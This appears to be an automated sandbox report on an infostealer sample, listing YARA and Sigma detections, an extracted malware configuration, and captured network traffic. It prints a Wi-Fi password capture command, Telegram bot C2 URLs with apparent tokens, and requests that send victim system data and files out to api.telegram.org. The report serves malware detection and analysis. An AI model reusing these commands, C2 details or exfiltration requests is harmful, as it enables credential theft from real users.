0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25663:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2773f:$s1: \VPN\NordVPN 0x27725:$s2: \VPN\OpenVPN 0x27707:$s3: \VPN\ProtonVPN
0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x25e9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x25f0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x25f97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x26029:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x26093:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x26105:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2619b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2622b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x11f8c:$x3: StormKitty 0x1b6ca:$s1: GetBSSID 0x1b5ca:$s2: GetAntivirus 0x26b4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x26d7d:$s6: "encrypted_key":"(.*?)"
0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x290e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0xaab80:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25663:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0xa7101:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2773f:$s1: \VPN\NordVPN 0xa91dd:$s1: \VPN\NordVPN 0x27725:$s2: \VPN\OpenVPN 0xa91c3:$s2: \VPN\OpenVPN 0x27707:$s3: \VPN\ProtonVPN 0xa91a5:$s3: \VPN\ProtonVPN
0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x25e9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xa7939:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x25f0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xa79ab:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x25f97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xa7a35:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x26029:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xa7ac7:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x26093:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xa7b31:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x26105:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xa7ba3:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2619b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xa7c39:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2622b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0xa7cc9:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x11f8c:$x3: StormKitty 0x93a2a:$x3: StormKitty 0x1b6ca:$s1: GetBSSID 0x9d168:$s1: GetBSSID 0x1b5ca:$s2: GetAntivirus 0x9d068:$s2: GetAntivirus 0x26b4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0xa85e9:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x26d7d:$s6: "encrypted_key":"(.?)" 0xa881b:$s6: "encrypted_key":"(.?)"
Click to see the 51 entries

Sigma Signatures

System Summary

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 104.16.185.241, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 8040, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49724

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentProcessId: 8040, ParentProcessName: MSBuild.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 1036, ProcessName: cmd.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: AsyncRAT {"Server": "127.0.0.1", "Ports": "6606,7707,8808", "Telegram C2": "https://api.telegram.org/bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendMessage?chat_id=5635047295", "Version": "", "AES_key": "VIfxfqryUTyZUBGDCBAvbYVYIsexIM7Z", "Mutex": "AsyncMutex_6SI8OkPnk", "Certificate": "MIIE9jCCAt6gAwIBAgIQAKQXqY8ZdB/modqi69mWGTANBgkqhkiG9w0BAQ0FADAcMRowGAYDVQQDDBFXb3JsZFdpbmQgU3RlYWxlcjAgFw0yMTA3MTMwNDUxMDZaGA85OTk5MTIzMTIzNTk1OVowHDEaMBgGA1UEAwwRV29ybGRXaW5kIFN0ZWFsZXIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCnRXYoxuLqqgXdcvIAYWb9DuVRl5ZpdpPfoIgmb7Y9A9AuiddKNm4is8EvIlEh98bQD4OBaK0EGWuj7WuAcQPCCGuzHpDqFZbXR7iRqVn6TiLRsO0LCMB4ta4XLQ4JdTFXvnQHcGiUxHddH70T/2P2bBVY0W+PVJDzG3XUWHpYb4PVv7qaQr/DalR3qyyd5otzE1kIjJLCOCyI/9ntIcD/PbMTKVnCP4fzbnkNB+xy0PmQmx3WRWEF5q72TdgaKrCbOpR2C/+rfGIoPC6Ze6dqWO3bQLGt6jpCO8A4CtAaAYmiw1vHUOfP54BgI9ls1TjYO3Rn4R1jmhWBGV2pT5chrglgSxMzPhrxFTQljG78RlPCJmyagJbtnPL3AlV34sQggcbf+80FVeyechm/xrMTSWXrJQ+xek1HRJBDFoCJyUR7SuIUelOW24TU+rwl/2dcALLZXpjYu3/zvJjH4iaJXRCt7oWhfzIFG1bHBFr78kV9VP0H+ZNVb129eUr14F/uubAoIPAz2EHG/CXBZv9GkFuzw0NgsI1eP7AznCLdT+z91M+yB7vWtvclwQ5k6MxWDPOraG5JMjUHvKI6zvyZ4IQ2a7bUENDghxLAqIxgo7zfZMdrjbRxBlqW14oki6Um7GpGKEZ0s2Ip6K2yJHBLpbVxOYjyzrxohMguh+qvgQIDAQABozIwMDAdBgNVHQ4EFgQUmTejTtK6on20N0YJez5sAZdMe/kwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAhauA0si7sHBd06DSGJgP5vJxL2daW30wR5XbAJd0HWj3QWfl7w27iyZ5AqBT4B0ojLNuMUG8mUOvpcoq0m80qUX7TIKUULKvb+i7uGGEDxk3W5F3es/CTUUWO0QlseWx9QEYziGlp6f3tkP4PTGSL0DywVRSa8l6f/B5kqwnW17CbQfJZ8vmy5snpDO/avgYssUnQtKQPhos7GbokNHps/bxEIRfLeprzQox20dw4RV59LcorjP5QV7Vc6FuYmhzC0nfRetTHckyxg66O3ekfTVs87MLiDV0ipQ+D/6k3g6DRuTdd4V2khjtI56ujSqTQ2PueNQXPu8y2fdsT2Rd1LcfxMS1xKAhSwhHfyy0I3JwzPG1D+sm3QNJEOoJviSNn5fYOFpY+mSEkFNMMeEbwOFdHxWbkiJk/Z8VwdH5I52tkHU3sRQMuZHtcKUc/SIt5Ivv6gtuEZQdm1GE6KUdiRB95s8JVGNlCcHX5bXbScu4eKCRQn3Cl+m5KR4EzI6hVP/iDRhVKj7Dn/blOHLzhNS5vW4X085dTP+1TBL8CHpQpiA3t8LfqfV1b/+WahOd3jNBNTXXfe/AQSjErgctLMdmOBpUQaJLOlcDcKGxWQdOo102nxg8Y/kFDARccywugoQxuIZpMYq74tjnJlJZ9kqR/LPrjmvx4v+0XFsaCPE=", "ServerSignature": "J7XpD4w+JaFzTixc0nCmiRA4ZP4bPCIpEYYGofNxvC1+0OsFQr56oTWwQMosnOTB64TZRGSdXVHKzjVchQf7X5Uwu/KQU61NPArjxWVScwKZXOGS4ZNzsWbrxgztkmlyRlQgvEq4rdFsqy1bfvHEoQ/s9aDXBNoLPPjJOexTRQSGuZYMpGSUD+ZUiVwPqqFWTb8KcjEMyABMeXGKfia2e9u8ePKpWv4HSiOfl6N47tTtIfN2FW/2mCX7BOnIZwCl3UxaQnITN812tHD1enX9TK86R91F02c0wabnf4oC07S3cqiXYo1yZ5y3dDnnERLagBuX1bemwzX/7DjHkfOaIPLgAAO8vGHbQX3pPqmwC88sG1+FExp3FEKMITnQTqQr5uXa5GjggFUSFr9rt2nfcjEjHRnOzX1jpsUUtuDyqoAFhdosdv46x+o5Iod34II88nouxzyzAfMSa48ozukJ3fCknI6u9fj/it1dx0GimhXUv4YG4A19n3EdvJbaxZXImHZvqiYGsHTIUtxa89QhxCpuJPKdTP7ya5rJFkDT0Z8ijH4Z1Dv42umyEN6PT99JRuJHcXSqkXfOeOilnM6YRY019FHq6udNVWn5OQetK4ULVcQmwPTV26ZRPyrqO57Rjr5LeSauZtNKTE/kmS1iR3eMtq5PsAHunrHZPzzaUhY=", "Group": "Default"}
Source: MSBuild.exe.8040.6.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendMessage"}

Multi AV Scanner detection for submitted file

Source: Kh7W85ONS7.exe	Virustotal: Detection: 45%			Perma Link
Source: Kh7W85ONS7.exe	ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Kh7W85ONS7.exe

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.8:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.8:49729 version: TLS 1.2

Source: Kh7W85ONS7.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: winload_prod.pdb source: Temp.txt.6.dr
Source:	Binary string: ntkrnlmp.pdb source: Temp.txt.6.dr
Source:	Binary string: winload_prod.pdb\ source: Temp.txt.6.dr
Source:	Binary string: ntkrnlmp.pdb\ source: Temp.txt.6.dr

Networking

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 6.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendMessage?chat_id=5635047295&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-07-01%203:19:22%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20960781%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20B3BZ8W6Y%0ARAM:%204095MB%0AHWID:%20B4D18CF796%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendMessage?chat_id=5635047295&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: POST /bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendDocument?chat_id=5635047295 HTTP/1.1Content-Type: multipart/form-data; boundary="382cb4b8-21f0-4694-ab9c-8df98334f9dd"Host: api.telegram.orgContent-Length: 188508Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET /raw/7B75u64B HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 HTTP/1.1Content-Type: multipart/form-data; boundary="6fc0eb9b-b905-443d-9bab-0486ae47313c"Host: api.telegram.orgContent-Length: 188508Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View	IP Address: 104.21.44.66 104.21.44.66
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.16.185.241 104.16.185.241

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: icanhazip.com
Source: unknown	DNS query: name: icanhazip.com

Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendMessage?chat_id=5635047295&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-07-01%203:19:22%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20960781%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20B3BZ8W6Y%0ARAM:%204095MB%0AHWID:%20B4D18CF796%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendMessage?chat_id=5635047295&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /raw/7B75u64B HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: 13.169.14.0.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: icanhazip.com
Source: global traffic	DNS traffic detected: DNS query: api.mylnikov.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: pastebin.com

Source: unknown

HTTP traffic detected: POST /bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendDocument?chat_id=5635047295 HTTP/1.1Content-Type: multipart/form-data; boundary="382cb4b8-21f0-4694-ab9c-8df98334f9dd"Host: api.telegram.orgContent-Length: 188508Expect: 100-continue

Source: MSBuild.exe, 00000006.00000002.2617809972.000000000317B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2617809972.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: MSBuild.exe, 00000006.00000002.2617809972.000000000317B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2617809972.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.orgd
Source: MSBuild.exe, 00000006.00000002.2617809972.0000000003197000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com
Source: MSBuild.exe, 00000006.00000002.2617809972.0000000003197000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.comd
Source: MSBuild.exe, 00000006.00000002.2617809972.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: tmpD17D.tmp.dat.6.dr, tmpD1B0.tmp.dat.6.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSBuild.exe, 00000006.00000002.2617809972.0000000002F6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: MSBuild.exe, 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: MSBuild.exe, 00000006.00000002.2617809972.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283
Source: MSBuild.exe, 00000006.00000002.2617809972.0000000003155000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendDocument?chat_id=5635
Source: MSBuild.exe, 00000006.00000002.2617809972.0000000002F6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7322917184:AAEZSbuOE5wiEr26jHjFYvUlp0J9RAox2lU/sendMessage?chat_id=56350
Source: Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/file/bot
Source: MSBuild.exe, 00000006.00000002.2617809972.0000000003155000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2617809972.000000000317B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgD
Source: tmpD17D.tmp.dat.6.dr, tmpD1B0.tmp.dat.6.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmpD17D.tmp.dat.6.dr, tmpD1B0.tmp.dat.6.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmpD17D.tmp.dat.6.dr, tmpD1B0.tmp.dat.6.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmpD17D.tmp.dat.6.dr, tmpD1B0.tmp.dat.6.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmpD17D.tmp.dat.6.dr, tmpD1B0.tmp.dat.6.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmpD17D.tmp.dat.6.dr, tmpD1B0.tmp.dat.6.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MSBuild.exe, 00000006.00000002.2617809972.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: MSBuild.exe, 00000006.00000002.2617809972.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty0&
Source: MSBuild.exe, 00000006.00000002.2617809972.0000000003197000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
Source: Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2617809972.0000000003155000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/7B75u64B
Source: MSBuild.exe, 00000006.00000002.2617809972.0000000003197000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/7B75u64Bd
Source: Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13
Source: places.raw.6.dr	String found in binary or memory: https://support.mozilla.org
